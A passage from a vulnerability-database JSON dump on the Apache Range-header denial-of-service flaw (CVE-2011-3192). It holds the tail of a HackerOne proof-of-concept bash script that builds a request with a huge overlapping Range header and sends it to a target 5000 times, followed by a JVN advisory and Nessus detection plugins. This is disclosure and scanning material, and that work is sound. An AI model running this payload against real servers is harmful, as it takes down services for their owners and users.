-350,5-351,5-352,5-353,5-354,5-355,5-356,5-357,5-358,5-359,5-360,5-361,5-362,5-363,5-364,5-365,5-366,5-367,5-368,5-369,5-370,5-371,5-372,5-373,5-374,5-375,5-376,5-377,5-378,5-379,5-380,5-381,5-382,5-383,5-384,5-385,5-386,5-387,5-388,5-389,5-390,5-391,5-392,5-393,5-394,5-395,5-396,5-397,5-398,5-399,5-400,5-401,5-402,5-403,5-404,5-405,5-406,5-407,5-408,5-409,5-410,5-411,5-412,5-413,5-414,5-415,5-416,5-417,5-418,5-419,5-420,5-421,5-422,5-423,5-424,5-425,5-426,5-427,5-428,5-429,5-430,5-431,5-432,5-433,5-434,5-435,5-436,5-437,5-438,5-439,5-440,5-441,5-442,5-443,5-444,5-445,5-446,5-447,5-448,5-449,5-450,5-451,5-452,5-453,5-454,5-455,5-456,5-457,5-458,5-459,5-460,5-461,5-462,5-463,5-464,5-465,5-466,5-467,5-468,5-469,5-470,5-471,5-472,5-473,5-474,5-475,5-476,5-477,5-478,5-479,5-480,5-481,5-482,5-483,5-484,5-485,5-486,5-487,5-488,5-489,5-490,5-491,5-492,5-493,5-494,5-495,5-496,5-497,5-498,5-499,5-500,5-501,5-502,5-503,5-504,5-505,5-506,5-507,5-508,5-509,5-510,5-511,5-512,5-513,5-514,5-515,5-516,5-517,5-518,5-519,5-520,5-521,5-522,5-523,5-524,5-525,5-526,5-527,5-528,5-529,5-530,5-531,5-532,5-533,5-534,5-535,5-536,5-537,5-538,5-539,5-540,5-541,5-542,5-543,5-544,5-545,5-546,5-547,5-548,5-549,5-550,5-551,5-552,5-553,5-554,5-555,5-556,5-557,5-558,5-559,5-560,5-561,5-562,5-563,5-564,5-565,5-566,5-567,5-568,5-569,5-570,5-571,5-572,5-573,5-574,5-575,5-576,5-577,5-578,5-579,5-580,5-581,5-582,5-583,5-584,5-585,5-586,5-587,5-588,5-589,5-590,5-591,5-592,5-593,5-594,5-595,5-596,5-597,5-598,5-599,5-600,5-601,5-602,5-603,5-604,5-605,5-606,5-607,5-608,5-609,5-610,5-611,5-612,5-613,5-614,5-615,5-616,5-617,5-618,5-619,5-620,5-621,5-622,5-623,5-624,5-625,5-626,5-627,5-628,5-629,5-630,5-631,5-632,5-633,5-634,5-635,5-636,5-637,5-638,5-639,5-640,5-641,5-642,5-643,5-644,5-645,5-646,5-647,5-648,5-649,5-650,5-651,5-652,5-653,5-654,5-655,5-656,5-657,5-658,5-659,5-660,5-661,5-662,5-663,5-664,5-665,5-666,5-667,5-668,5-669,5-670,5-671,5-672,5-673,5-674,5-675,5-676,5-677,5-678,5-679,5-680,5-681,5-682,5-6
83,5-684,5-685,5-686,5-687,5-688,5-689,5-690,5-691,5-692,5-693,5-694,5-695,5-696,5-697,5-698,5-699,5-700,5-701,5-702,5-703,5-704,5-705,5-706,5-707,5-708,5-709,5-710,5-711,5-712,5-713,5-714,5-715,5-716,5-717,5-718,5-719,5-720,5-721,5-722,5-723,5-724,5-725,5-726,5-727,5-728,5-729,5-730,5-731,5-732,5-733,5-734,5-735,5-736,5-737,5-738,5-739,5-740,5-741,5-742,5-743,5-744,5-745,5-746,5-747,5-748,5-749,5-750,5-751,5-752,5-753,5-754,5-755,5-756,5-757,5-758,5-759,5-760,5-761,5-762,5-763,5-764,5-765,5-766,5-767,5-768,5-769,5-770,5-771,5-772,5-773,5-774,5-775,5-776,5-777,5-778,5-779,5-780,5-781,5-782,5-783,5-784,5-785,5-786,5-787,5-788,5-789,5-790,5-791,5-792,5-793,5-794,5-795,5-796,5-797,5-798,5-799,5-800,5-801,5-802,5-803,5-804,5-805,5-806,5-807,5-808,5-809,5-810,5-811,5-812,5-813,5-814,5-815,5-816,5-817,5-818,5-819,5-820,5-821,5-822,5-823,5-824,5-825,5-826,5-827,5-828,5-829,5-830,5-831,5-832,5-833,5-834,5-835,5-836,5-837,5-838,5-839,5-840,5-841,5-842,5-843,5-844,5-845,5-846,5-847,5-848,5-849,5-850,5-851,5-852,5-853,5-854,5-855,5-856,5-857,5-858,5-859,5-860,5-861,5-862,5-863,5-864,5-865,5-866,5-867,5-868,5-869,5-870,5-871,5-872,5-873,5-874,5-875,5-876,5-877,5-878,5-879,5-880,5-881,5-882,5-883,5-884,5-885,5-886,5-887,5-888,5-889,5-890,5-891,5-892,5-893,5-894,5-895,5-896,5-897,5-898,5-899,5-900,5-901,5-902,5-903,5-904,5-905,5-906,5-907,5-908,5-909,5-910,5-911,5-912,5-913,5-914,5-915,5-916,5-917,5-918,5-919,5-920,5-921,5-922,5-923,5-924,5-925,5-926,5-927,5-928,5-929,5-930,5-931,5-932,5-933,5-934,5-935,5-936,5-937,5-938,5-939,5-940,5-941,5-942,5-943,5-944,5-945,5-946,5-947,5-948,5-949,5-950,5-951,5-952,5-953,5-954,5-955,5-956,5-957,5-958,5-959,5-960,5-961,5-962,5-963,5-964,5-965,5-966,5-967,5-968,5-969,5-970,5-971,5-972,5-973,5-974,5-975,5-976,5-977,5-978,5-979,5-980,5-981,5-982,5-983,5-984,5-985,5-986,5-987,5-988,5-989,5-990,5-991,5-992,5-993,5-994,5-995,5-996,5-997,5-998,5-999,5-1000,5-1001,5-1002,5-1003,5-1004,5-1005,5-1006,5-1007,5-1008,5-1009,5-1010,5-1011,5-1012,5-1013,5-1
014,5-1015,5-1016,5-1017,5-1018,5-1019,5-1020,5-1021,5-1022,5-1023,5-1024,5-1025,5-1026,5-1027,5-1028,5-1029,5-1030,5-1031,5-1032,5-1033,5-1034,5-1035,5-1036,5-1037,5-1038,5-1039,5-1040,5-1041,5-1042,5-1043,5-1044,5-1045,5-1046,5-1047,5-1048,5-1049,5-1050,5-1051,5-1052,5-1053,5-1054,5-1055,5-1056,5-1057,5-1058,5-1059,5-1060,5-1061,5-1062,5-1063,5-1064,5-1065,5-1066,5-1067,5-1068,5-1069,5-1070,5-1071,5-1072,5-1073,5-1074,5-1075,5-1076,5-1077,5-1078,5-1079,5-1080,5-1081,5-1082,5-1083,5-1084,5-1085,5-1086,5-1087,5-1088,5-1089,5-1090,5-1091,5-1092,5-1093,5-1094,5-1095,5-1096,5-1097,5-1098,5-1099,5-1100,5-1101,5-1102,5-1103,5-1104,5-1105,5-1106,5-1107,5-1108,5-1109,5-1110,5-1111,5-1112,5-1113,5-1114,5-1115,5-1116,5-1117,5-1118,5-1119,5-1120,5-1121,5-1122,5-1123,5-1124,5-1125,5-1126,5-1127,5-1128,5-1129,5-1130,5-1131,5-1132,5-1133,5-1134,5-1135,5-1136,5-1137,5-1138,5-1139,5-1140,5-1141,5-1142,5-1143,5-1144,5-1145,5-1146,5-1147,5-1148,5-1149,5-1150,5-1151,5-1152,5-1153,5-1154,5-1155,5-1156,5-1157,5-1158,5-1159,5-1160,5-1161,5-1162,5-1163,5-1164,5-1165,5-1166,5-1167,5-1168,5-1169,5-1170,5-1171,5-1172,5-1173,5-1174,5-1175,5-1176,5-1177,5-1178,5-1179,5-1180,5-1181,5-1182,5-1183,5-1184,5-1185,5-1186,5-1187,5-1188,5-1189,5-1190,5-1191,5-1192,5-1193,5-1194,5-1195,5-1196,5-1197,5-1198,5-1199,5-1200,5-1201,5-1202,5-1203,5-1204,5-1205,5-1206,5-1207,5-1208,5-1209,5-1210,5-1211,5-1212,5-1213,5-1214,5-1215,5-1216,5-1217,5-1218,5-1219,5-1220,5-1221,5-1222,5-1223,5-1224,5-1225,5-1226,5-1227,5-1228,5-1229,5-1230,5-1231,5-1232,5-1233,5-1234,5-1235,5-1236,5-1237,5-1238,5-1239,5-1240,5-1241,5-1242,5-1243,5-1244,5-1245,5-1246,5-1247,5-1248,5-1249,5-1250,5-1251,5-1252,5-1253,5-1254,5-1255,5-1256,5-1257,5-1258,5-1259,5-1260,5-1261,5-1262,5-1263,5-1264,5-1265,5-1266,5-1267,5-1268,5-1269,5-1270,5-1271,5-1272,5-1273,5-1274,5-1275,5-1276,5-1277,5-1278,5-1279,5-1280,5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299'\
r\n\r\necho \"+ -- --=[Constructing buffer...\"\r\necho \"GET / HTTP/1.1\" > /tmp/buf\r\necho \"Host: $TARGET\" >> /tmp/buf \r\necho $BUFFER >> /tmp/buf\r\necho 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0' >> /tmp/buf\r\necho 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' >> /tmp/buf\r\necho 'Accept-Language: en-US,en;q=0.5' >> /tmp/buf\r\necho 'Accept-Encoding: gzip, deflate' >> /tmp/buf\r\necho 'Connection: keep-alive' >> /tmp/buf\r\necho \"\" >> /tmp/buf \r\nsleep 1 \r\ncat /tmp/buf #DEBUG ONLY\r\nsleep 1\r\n\r\necho \"+ -- --=[Sending exploit...\"\r\necho \"\"\r\nsleep 3\r\n\r\nfor a in {1..5000}; \r\ndo \r\n\tcat /tmp/buf | $CMD $TARGET $PORT; \r\n\tcat /tmp/buf\r\n\techo \"Request: $a\"\r\ndone\r\n\r\nrm -f /tmp/buf\r\necho \"+ -- --=[Done!\"", "modified": "2016-01-01T21:56:22", "published": "2015-09-14T22:55:12", "id": "H1:88904", "href": "https://hackerone.com/reports/88904", "type": "hackerone", "title": "ownCloud: Apache Range Header Denial of Service Attack (Confirmed PoC)", "cvss": {"score": 0.0, "vector": "NONE"}}], "jvn": [{"lastseen": "2019-05-29T17:21:40", "bulletinFamily": "info", "description": "\n ## Description\n\nGIGAPOD file servers (Appliance model and Software model) from TripodWorks CO.,LTD. provide two web interfaces. First, a user web interface via ports 80/443, and a second, an administrative web interface via port 8001. The administrative web interface uses a version of the Apache HTTP server which contains a flaw in handling HTTP requests ([CVE-2011-3192](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192>)). As a result, GIGAPOD contains a denial-of-service (DoS) vulnerability.\n\n ## Impact\n\nA remote attacker may be able to cause a denial-of-service (DoS).\n\n ## Solution\n\n**Update the software** \nApply the appropriate update according to the information provided by the developer. 
\n\n\n ## Products Affected\n\n * GIGAPOD OFFICEHARD Appliance model versions 3.04.03 and earlier\n * GIGAPOD 2010 / GIGAPOD 3 Appliance model versions 3.01.02 and earlier\n * GIGAPOD 2010 / GIGAPOD 3 Software model versions 3.01.02 and earlier\n", "modified": "2014-10-16T00:00:00", "published": "2014-10-16T00:00:00", "id": "JVN:23809730", "href": "http://jvn.jp/en/jp/JVN23809730/index.html", "title": "JVN#23809730: GIGAPOD vulnerable to denial-of-service (DoS)", "type": "jvn", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2019-11-01T02:13:52", "bulletinFamily": "scanner", "description": "The Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP\nheaders. A remote attacker could use this flaw to cause httpd to use\nan excessive amount of memory and CPU time via HTTP requests with a\nspecially crafted Range header. (CVE-2011-3192)\n\nAll httpd users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.", "modified": "2019-11-02T00:00:00", "id": "ALA_ALAS-2011-1.NASL", "href": "https://www.tenable.com/plugins/nessus/78262", "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2011-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-1.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78262);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_xref(name:\"ALAS\", value:\"2011-1\");\n script_xref(name:\"RHSA\", value:\"2011:1245\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP\nheaders. A remote attacker could use this flaw to cause httpd to use\nan excessive amount of memory and CPU time via HTTP requests with a\nspecially crafted Range header. (CVE-2011-3192)\n\nAll httpd users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.18.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-01T02:26:15", "bulletinFamily": "scanner", "description": "The byte-range filter in the Apache HTTP Server 1.3.x, 2.0.x through\n2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a\ndenial-of-service (memory and CPU consumption) using a Range header\nthat expresses multiple overlapping ranges.\n\nWhen this 
vulnerability is exploited, the httpd process consumes all\navailable CPU cycles. As a result of CPU starvation, the Configuration\nutility, SSH sessions, and other userland processes may appear\nextremely slow or completely unresponsive. On BIG-IP systems, if the\nsystem hardware watchdog timer is not updated for more than 10\nseconds, the hardware watchdog restarts the system. (CVE-2011-3192)\n\nImpact\n\nThe performance of userland processes may be severely impaired, and\nthe system may eventually reboot.", "modified": "2019-11-02T00:00:00", "id": "F5_BIGIP_SOL13114.NASL", "href": "https://www.tenable.com/plugins/nessus/78131", "published": "2014-10-10T00:00:00", "title": "F5 Networks BIG-IP : Apache Range header vulnerability (K13114)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K13114.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78131);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/25 13:36:06\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_bugtraq_id(49303);\n\n script_name(english:\"F5 Networks BIG-IP : Apache Range header vulnerability (K13114)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The byte-range filter in the Apache HTTP Server 1.3.x, 2.0.x through\n2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a\ndenial-of-service (memory and CPU consumption) using a Range header\nthat expresses multiple overlapping ranges.\n\nWhen this vulnerability is exploited, the httpd process consumes all\navailable CPU cycles. 
As a result of CPU starvation, the Configuration\nutility, SSH sessions, and other userland processes may appear\nextremely slow or completely unresponsive. On BIG-IP systems, if the\nsystem hardware watchdog timer is not updated for more than 10\nseconds, the hardware watchdog restarts the system. (CVE-2011-3192)\n\nImpact\n\nThe performance of userland processes may be severely impaired, and\nthe system may eventually reboot.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K13114\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K13114.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K13114\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"10.1.0-10.2.2\",\"11.0.0\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.0.0HF1\",\"11.1.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"9.2.2-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.2-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"9.4.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"9.4.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# WOM\nvmatrix[\"WOM\"] = 
make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:17:41", "bulletinFamily": "scanner", "description": "This update fixes a remote denial of service bug (memory exhaustion)\nin the Apache 2 HTTP server, that could be triggered by remote\nattackers using multiple overlapping Request Ranges . (CVE-2011-3192)", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_4_APACHE2-110831.NASL", "href": "https://www.tenable.com/plugins/nessus/75786", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2011:0993-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5089.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75786);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/10/25 13:36:42\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_bugtraq_id(49303);\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2011:0993-1)\");\n script_summary(english:\"Check for the apache2-5089 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n 
script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a remote denial of service bug (memory exhaustion)\nin the Apache 2 HTTP server, that could be triggered by remote\nattackers using multiple overlapping Request Ranges . (CVE-2011-3192)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=713966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-09/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security 